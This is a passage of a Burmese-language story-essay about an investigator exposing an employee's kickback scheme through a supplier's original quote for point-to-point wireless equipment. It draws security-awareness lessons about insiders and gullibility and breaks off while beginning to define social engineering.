ေကာ္ဖီတစ္ခြက္နဲ႕၊ ကြန္ၿပဴတာေရွ႕ထုိင္ေနတဲ့ စံုစမ္းသူဆီ၊ ကုမၸဏီ abc ရဲ႕ secretary ဖုန္းေခၚဆုိလာပါတယ္။ ၿပီးေတာ့၊ “အခု Y ကုမၸဏီက အီးေမးလ္ တစ္ေစာင္ ၀င္လာတယ္၊ ၿပီးေတာ့၊ သုိ႕ ေနရာမွာ၊ abc ကုမၸဏီ IT Manager နာမည္နဲ႕၊ ၿဖစ္ေနၿပီး အီးေမးလ္ရဲ႕၊ subject မွာ as mr. investigator’s request လုိ႕ပါေနလို႕၊ ဖုန္းေခၚလုိက္တာပါ။” လုိ႕ေမးခဲ့ပါတယ္။ စံုစမ္းသူက “ဟုတ္တယ္၊ အဲဒါ စာရင္းအမွန္ပဲ၊ Y ကုမၸဏီ ဆီကေန၊ ေတာင္းလုိက္တာပါ အဲဒီထဲမွာပါတဲ့ စာရင္းကုိေသခ်ာ စစ္ေဆးၾကည့္ႏုိင္ေအာင္လို႕ abc ကုမၸဏီ ရဲ႕ အတြင္းေရးမႈးဆီပုိ႕ ခုိင္းခဲ့တာပါ။” လုိ႕ ေၿဖခဲ့ပါတယ္။
ကုိရိုက္စားရဲ႕ အားနည္းခ်က္ကေတာ့၊ သူကုိယ္တုိင္ ကြ်မ္းက်င္မႈမရွိပဲ၊ သူ႕ေလာက္မတတ္တဲ့ သူေတြအေပၚ လွည့္စားခ်င္တဲ့ သေဘာထား ပါပဲ။
ကုမၸဏီ Y ရဲ႕ မူရင္းစာရင္းကုိၾကည့္ရေအာင္ ။ ။
Y ကုမၸဏီ
သုိ႕ : အိုင္တီ မန္ေနဂ်ာ (abc ကုမၸဏီ)
အေၾကာင္းအရာ။ ။ point to point wireless ခ်ိတ္ဆက္မႈ စာရင္း
# Item # Description Qty per Item Total
1 AM-5G20-90 4.9-5.9GHz airMAX Base Station, 1 164 164
20dBi, 90 deg w/ rocket kit
2 ROCKETM5 5GHz Rocket MIMO, airMAX 1 98 98
3 PBM5 5GHz PowerBridge MIMO, airMAX 1 297 297
4 TC-Carrier TOUGH Cable, Level 2 70 M 0.6 42
6 IL-SRV2 Complete Setup Installation 1 1000 1000
TOTAL US$ 1601

ကြ်န္ေတာ္တုိ႕ေတြ၊ ကုိယ္နားမလည္တဲ့ နယ္ပယ္ေတြမွာ ကုိယ္စီ ရိုက္စားလုပ္ခံရတာေတြ အၿမဲၾကံဳေတြ႕ေနရပါတယ္။ ဒါေပမယ့္၊ တကယ္လုိ႕ ကူညီေပးမယ့္သူ တစ္ေယာက္ သာ ရွိခဲ့မယ္ဆုိရင္လုိ႕ ကြ်န္ေတာ္တုိ႕ အၿမဲေတြးတတ္ၾကပါတယ္။ တစ္ခါတစ္ေလ၊ ကြ်န္ေတာ္တုိ႕ အားကုိးတဲ့ သူေတြကပဲ ကြ်န္ေတာ္တုိ႕ကုိ ရိုက္စားလုပ္ ႏုိင္ပါတယ္။ ဗိုလ္ခ်ဳပ္ေအာင္ဆန္း မိန္႕ခြန္းတစ္ခုၿဖစ္တဲ့ “အနီးဆံုး ရန္သူကုိ ရွာတုိက္”၊ ဆိုတဲ့အတိုင္း၊ ကိုယ္ကုိယ္တုိင္က အနီးဆံုးရန္သူလုိ႕ယူဆၾကည့္ပါ၊ ကြ်န္ေတာ္တုိ႕ ကုိယ့္ကုိယ္ကုိ အရင္ဆံုးၿပန္ေမးရမွာက၊ “ဒါ ၿဖစ္ႏုိင္ရဲ႕လား?” လုိ႕ၿဖစ္ပါတယ္။ ကြ်န္ေတာ္တုိ႕ရဲ႕ ယံုၾကည္လြယ္ၿခင္းကုိ၊ အရင္တုိက္ထုတ္သင့္ပါတယ္။ ၿပီးေတာ့၊ အတြင္းလူ။ ယခု ရိုက္စားလုပ္ၿခင္းမွာ၊ ကုမၸဏီရဲ႕၀န္ထမ္းတစ္ေယာက္ၿဖစ္တဲ့ ကုိရိုက္စားက ဘာေၾကာင့္ ဒီေလာက္အထိလုပ္ရဲ တာလဲ? ကြ်န္ေတာ္တုိ႕ရဲ႕ စီမံေရး၊ အုပ္ခ်ဳပ္ေရး၊ ၀န္ထမ္းေတြအတြက္ ဗဟုသုတပညာေပးၿခင္းေတြ လုိေနလား၊ ဒါမွမဟုတ္ သူတုိ႕ ကုိယ္တိုင္ပါ၀င္ ပတ္သက္ေနတာလား? ၀န္ထမ္းေတြမ်ားစြာနဲ႕ အလုပ္လုပ္ေနတဲ့၊ ကုမၸဏီတစ္ခုက၊ တံခါးေပါက္မ်ားတဲ့ အိမ္တစ္လံုးနဲ႕ တူပါတယ္။ တံခါး တစ္ခ်ပ္တည္းကုိ လံုၿခံဳေအာင္ ဂရုစိုက္ေနတာက တစ္အိမ္လံုး မလံုၿခံဳႏုိင္ပါဘူး။
ဒါေၾကာင့္၊ ကြ်န္ေတာ္တုိ႕လုပ္ငန္းေတြမွာ၊ က်င့္၀တ္ညီတဲ့ ဟက္ကာတစ္ေယာက္ရွိဖုိ႕နဲ႕ ခုိင္ၿမဲတဲ့ ကြန္ၿပဴတာ၊ နက္ေ၀ါ့ခ္ လံုၿခံဳေရးေပၚလစီေတြ ရွိဖုိ႕ ေသခ်ာကုိ လုိအပ္ပါတယ္။
“လူမႈေရးကုိ ဇာတ္လမ္းဆင္တဲ့၊ လူမႈေရးဇာတ္လမ္းဆင္ၿခင္းေတြ ဆုိတာ၊ လိမ္တာေပါ့?” လုိ႕ အဖုိးကေမးခဲ့ပါတယ္။
“လူူမႈေရး ဇာတ္လမ္းဆင္ၿခင္းဆုိတာ၊ လူေတြရဲ႕ စိတ္ဓါတ္ေရးရာၾကိဳးကုိင္ၿခင္းလုိ႕ အတိုခ်ံဳးသိႏုိင္ပါတယ္၊ တရား၀င္တဲ့ လိမ္လည္ၿခင္းေပါ့၊ ဒါေပမယ့္ ရုပ္ရွင္ရံုလုိ လူထူတဲ့ေနရာေတြမွာ “မီးဗ်ိဳ႕” လုိ႕ေတာ့ မေအာ္နဲ႕ေပါ့ ဗ်ာ။ လူူမႈေရး ဇာတ္လမ္းဆင္ၿခင္းကုိ အေသးစိတ္ေၿပာရရင္ေတာ့။။”